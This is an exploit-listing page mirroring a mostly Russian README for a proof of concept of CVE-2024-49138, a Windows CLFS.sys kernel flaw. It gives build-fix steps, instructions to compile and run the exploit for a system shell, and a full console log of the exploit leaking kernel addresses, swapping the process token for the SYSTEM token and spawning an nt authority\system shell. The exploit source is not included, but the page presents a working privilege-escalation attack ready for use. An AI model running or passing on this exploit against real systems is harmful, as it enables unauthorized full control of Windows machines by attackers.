Sploitus

Exploit for CVE-2024-49138-POC

kitploit · 2026-09-02

Exploit Code

MARKDOWN83 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BANANONAME-CVE-2024-49138-POC
# CVE-2024-49138-POC

# Исправление ошибки Decombine

root@kitploit:~
    
    
    C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(456,5): error MSB8020: The build tools for Visual Studio 2019 (Platform Toolset = 'v142') cannot be found. To build using the v142 build tools, please install Visual Studio 2019 build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Retarget solution".
    

# Вариант 1: Установка средств сборки v142 для Visual Studio 2022

**1\. Откройте установщик Visual Studio:**

Перейдите в меню «Пуск» и откройте установщик Visual Studio.

**2\. Измените установку Visual Studio:**

Выберите Visual Studio 2022 и нажмите «Изменить».

**3\. Установите необходимый набор инструментов:**

На вкладке «Отдельные компоненты» найдите: **MSVC v142 — средства сборки VS 2019 C++ x64/x86** Выберите его и нажмите «Установить». **4\. Пересоберите проект:** После установки пересоберите проект в Visual Studio 2022.

Эксплоит, использующий CVE-2024-49138 в CLFS.sys.

CrowdStrike обнаружила, что эта уязвимость активно эксплуатируется злоумышленниками.

Протестировано на **Windows 11 23h2**.

Подробный анализ будет представлен в отдельной статье в блоге.

## Компиляция и запуск

Скомпилируйте 64-битную версию Release.

Запустите и получите системную оболочку.

root@kitploit:~
    
    
    PS C:\Users\IEUser\Desktop> whoami
    windows11\ieuser
    PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
    Directory created successfully: C:\temp
    Directory created successfully: C:\temp
    file opened successfully
    AddLogContainer successful
    hResource = 0x00007FF7CDB89080
    hResource = 0x00007FF7CDB890A0
    pResourceData = 0x00007FF7CDB890A0
    Resource size: 65536 bytes
    Resource written to output.bin successfully.
    Kernel Base Address: 0xFFFFF80339800000
    Kernel Name: ntoskrnl.exe
    NtReadVirtualMemory = 0x00007FFFAF0EFB40
    NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
    pcclfscontainer = 0x0000000002100000
    address_to_write = 0xFFFFC201424CC2B2
    Process priority set to REALTIME_PRIORITY_CLASS.
    Thread priority set to the highest level: TIME_CRITICAL.
    triggering vuln...CreateLogFile failed with error 6601
    Process priority set to NORMAL_PRIORITY_CLASS.
    Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
    vuln triggered
    reading base of ntoskrnl to check we have arbitrary read/write
    buf = 0x0000000300905A4D
    swapping tokens...
    current token address = 0xFFFFC201423EC578
    systemtoken = 0xFFFFD401F501C6E9
    Overwriting process token..
    token swapped. Restoring PreviousMode and spawning system shell...
    Microsoft Windows [Version 10.0.22631.2861]
    (c) Microsoft Corporation. All rights reserved.
    
    C:\Users\IEUser\Desktop>whoami
    nt authority\system
    
    C:\Users\IEUser\Desktop>
    

![systemshell](https://assets.kitploit.com/production/public/readmes/23119/3a13bb75e899fbffeca0ea675128383c48b0b3252c92fae21b22db7d8022bda0.gif)